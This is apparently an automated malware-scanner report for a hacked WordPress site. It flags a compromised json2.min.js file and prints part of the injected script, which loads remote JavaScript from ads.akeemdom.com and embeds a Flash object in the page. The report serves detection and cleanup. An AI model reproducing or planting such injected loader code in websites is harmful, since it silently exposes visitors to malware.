New scan:

Malware Scanner report for yc-workshop.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "yc-workshop.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=yc-workshop.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://yc-workshop.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 02:56:23 GMT
Location: http://www.yc-workshop.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.yc-workshop.com/xmlrpc.php
clean
http://www.yc-workshop.com/
200 OK
Content-Length: 38580
Content-Type: text/html
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=4.0.1
200 OK
Content-Length: 33
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-includes/js/jquery/jquery.js?ver=1.11.1
200 OK
Content-Length: 95807
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=4.0.1
200 OK
Content-Length: 24995
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=4.0.1
200 OK
Content-Length: 5337
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=4.0.1
200 OK
Content-Length: 891
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4
200 OK
Content-Length: 15667
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=4.0.1
200 OK
Content-Length: 890
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-includes/js/json2.min.js?ver=2011-02-23
200 OK
Content-Length: 20342
Content-Type: text/javascript
malicious
Malicious code found. Script contains blacklisted domain: ads.akeemdom.com

var JSON;
if (!JSON) {
JSON = {};
}
(function () {
"use strict";
function f(n) {
return n < 10 ? '0' + n : n;
}
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear() + '-' +
f(this.getUTCMonth() + 1) + '-' +

...[3757 bytes skipped]...

Decoded script:

...[544 bytes skipped]...

___ememem.id = 'frfrfr_shit';
document.body.appendChild(___ememem);

var fv = { dalink: pPetushok};
swfobject.embedSWF('./wp-includes/js/swfobjct.swf', "frfrfr_shit", "16", "16", "9.0.0", false, fv);
}
}
}


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type='text/javascript';
script.src='http://ads.akeemdom.com/db26';
script.id='yoyoyo_shit';
head.appendChild(script);

var ___scscsc = null;
var ___ememem = null;


var UU_DynScr = function(pSrc)
{
var s = document.createElement("script"); s.type = "text/javascript"; s.src = pSrc; document.head.appendChild(s); return s;
}

var UU_SinkShit = function(pPetushok)
{
___scscsc = UU_DynScr('http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject_src.js');
<
...[660 bytes skipped]...

http://www.yc-workshop.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
200 OK
Content-Length: 15248
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.0.3
200 OK
Content-Length: 9658
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/themes/oriental/js/tinynav.min.js?ver=20130304
200 OK
Content-Length: 835
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/themes/oriental/js/onload.js?ver=20130304
200 OK
Content-Length: 1517
Content-Type: text/javascript
clean
http://www.yc-workshop.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/common.js?ver=4.0.1
200 OK
Content-Length: 3386
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: yc-workshop.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 02:56:23 GMT
Location: http://www.yc-workshop.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.yc-workshop.com/xmlrpc.php

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yc-workshop.com
Referer: http://www.google.com/search?q=yc-workshop.com

Result:
The result is similar to the first query. There are no suspicious redirects found.